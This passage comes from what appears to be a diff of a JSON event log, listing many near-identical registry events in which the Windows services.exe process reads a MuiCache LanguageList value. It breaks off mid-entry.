"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850430000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 